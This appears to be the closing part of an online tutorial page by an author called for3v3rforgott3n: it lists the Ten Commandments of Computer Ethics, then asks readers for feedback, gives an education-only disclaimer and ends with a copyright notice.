1. Thou shalt not use a computer to harm other people.

2. Thou shalt not interfere with other people’s computer work.

3. Thou shalt not snoop around in other people’s computer files.

4. Thou shalt not use a computer to steal.

5. Thou shalt not use a computer to bear false witness.

6. Thou shalt not copy or use proprietary software for which you have not paid.

7. Thou shalt not use other people’s computer resources without authorization or proper compensation.

8. Thou shalt not appropriate other people’s intellectual output.

9. Thou shalt think about the social consequences of the program you are writing or the system you are designing.

10. Thou shalt always use a computer in ways that insure consideration and respect for your fellow humans.

If you found this tutorial informative, please leave a comment or send me an email. If you found some errors or have any questions/suggestions, please don’t hesitate to comment or send me an email too!

All information contained here serves solely for education purposes, we do not promote or condone illegal acts/activities, all activities resulting from the information disclosed in this tutorial does not involve us in anyway. This tutorial is property of the author for3v3rforgott3n, and is not to be reproduced in any form anywhere without credits and the author’s exclusive permission. Links to this site however, are allowed.

© -§for3v3rforgott3n§-